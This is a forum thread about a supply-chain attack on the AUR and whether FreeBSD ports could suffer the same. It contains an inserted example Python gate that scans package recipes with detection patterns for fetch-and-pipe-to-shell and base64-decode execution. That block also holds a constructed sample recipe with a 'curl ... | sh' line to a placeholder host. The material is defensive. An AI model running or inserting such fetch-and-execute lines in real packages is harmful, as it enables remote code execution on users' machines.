Could what has just happened to the AUR happen to FreeBSD ports?

Eh, just my 2-cents, but in this day and age, I would think that there is always room for improvement in the CI/CD space. Changes need to be verified before further actions are done; if they fail, stop immediately and raise a red flag. In the context of 400+ packages, perhaps a distributed engine will manage that better.

Another reason to avoid user repositories unless you're actively inspecting what you're getting.
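One concrete form of "actively inspecting what you're getting" and of a pipeline gate that stops on failure is a pre-install check that reads a user-contributed build recipe and refuses to run it when it carries well-known red flags. The block below is an added example and is not code from this thread, from the AUR, or from FreeBSD ports; the sample recipe, the pattern list and the function names are all constructed for illustration, and the patterns are heuristics that call for a human look, not proof of compromise.

```python
"""Gate a user-contributed build recipe before it is executed.

Added example (not from the thread or any project). The recipe format
loosely follows a shell-style package recipe with source= and sha256sums=
arrays; the sample below is constructed, not a real package.
"""
import re
import shlex

# Heuristic red flags worth a reviewer's attention. Each entry is
# (name, compiled regex); matching means "stop and look", not "malicious".
RISKY_PATTERNS = [
    # fetch a remote script and pipe it straight into a shell
    ("remote-script-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    # decode embedded base64 and pipe the result into a shell
    ("base64-decode-exec", re.compile(r"base64\s+(-d|--decode)[^\n]*\|\s*(ba|z|da)?sh\b")),
    # eval of dynamically produced text
    ("eval-of-decoded-data", re.compile(r"\beval\b[^\n]*\$\(")),
    # sources fetched over plain http (no transport integrity)
    ("plain-http-source", re.compile(r"http://[^\s'\"]+")),
    # writes into user autostart locations from a package recipe
    ("install-to-user-autostart", re.compile(r"(\.bashrc|\.profile|systemd/user|autostart)")),
]


def scan_recipe(text):
    """Return (line_no, pattern_name, line) for every non-comment line that matches a red flag."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # comments are not executed, skip them
        for name, rx in RISKY_PATTERNS:
            if rx.search(stripped):
                findings.append((no, name, stripped))
    return findings


def skipped_checksums(text):
    """Count 'SKIP' entries in the sha256sums array; None if the array is absent."""
    m = re.search(r"sha256sums=\((.*?)\)", text, re.S)
    if not m:
        return None
    entries = shlex.split(m.group(1))
    return sum(1 for e in entries if e.upper() == "SKIP")


def gate(text):
    """Return (ok, report). ok is False on any finding, missing or skipped checksums."""
    findings = scan_recipe(text)
    skipped = skipped_checksums(text)
    report = [f"line {no}: {name}: {line}" for no, name, line in findings]
    if skipped is None:
        report.append("no sha256sums array: every source is unverified")
    elif skipped:
        report.append(f"{skipped} source(s) have checksum SKIP")
    return (not report), report


# Constructed sample recipe (not a real package); two lines are deliberately risky.
SAMPLE_RECIPE = """\
# constructed sample recipe, not a real package
pkgname=example-tool
pkgver=1.2.3
source=("https://example.invalid/example-tool-1.2.3.tar.gz"
        "http://example.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')

build() {
    cd "$srcdir/example-tool-$pkgver"
    make
}

package() {
    make DESTDIR="$pkgdir" install
    # a line like the next one is exactly what a reviewer wants flagged
    curl -fsSL https://example.invalid/post-install.sh | sh
}
"""

if __name__ == "__main__":
    ok, report = gate(SAMPLE_RECIPE)
    print("PASS" if ok else "FAIL")
    for entry in report:
        print("  " + entry)
```

Run against the constructed recipe the gate fails on three counts: a plain-http source, a checksum of SKIP, and a fetch-and-pipe-to-shell in package(). In a CI setting the non-zero result is the "stop immediately and raise a red flag" step; a passing scan is only a reason to do the human review, not a substitute for it.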
 
It's not 400+ packages. It's almost 2000 packages as of today. AUR is still under attack, the number of compromised packages is growing fast, and it's becoming more sophisticated and hard to find.
 
I think, as a cautionary tale, this is a good example of "don't blindly upgrade/update software". But it should give people a reason to think about accepting patches and pull requests (yes, I understand this is more than that).
Tongue in cheek/conspiracy mode:
"This is why you should only use Windows and Government Approved/Controlled applications because we will keep you safe"

To be clear, that was sarcasm (I hope)
 
I was going to say that perhaps we should only use Apple or Microsoft in the same vein ...

I used 400 as that was what was quoted earlier.

To me, this is no different than a DDoS attack; the platform should provide better tools to mitigate this. While we might be immune now, how long?

As the saying goes, the chain is only as strong as the weakest link.
 
To me, this is no different than a DDoS attack,
Ummm.... a DDOS is an attack from the outside. This "denial of service" happened from within. The attack vector has magnitude and direction, and they both matter. That is the difference (figuring out where the problem originated, outside or inside) that is actually important to understand when deciding if an incident is a DDOS or not. For reference:

https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/ offers a very nice and simple explanation of what a DDOS is. It's pretty safe to assume that if a service disruption does NOT check the boxes as described in that link, it's most likely NOT a DDOS to begin with, and requires very different approaches to problem solving.
 
astyle I understand and agree with you, but I think tOsYZYny's analogy is not far off. What happened/is happening with AUR results in something similar to a DDoS: loss of the asset. DDoS loss of asset is due to external forces; with AUR the loss is due to internal.

I'm not trying to speak for him, but that's how I read post #54. I could be wrong, if so everyone can flog me behind the bikeshed.
 
I have the suspicion that it's intentional to push for identification facilities around the end-user. Wait for it... They can't verify a user's authenticity without forced central supervision. The end user can no longer be root, like on Android and iOS.
 
I didn't mean it to be literal. I meant that the scope of the attack is large due to how fast AI can generate and obfuscate its tracks that even though this may be surgical now, the sheer volume of it is like a DDoS attack.

In any case, I still suggest that platforms need better tooling around 'security'.
 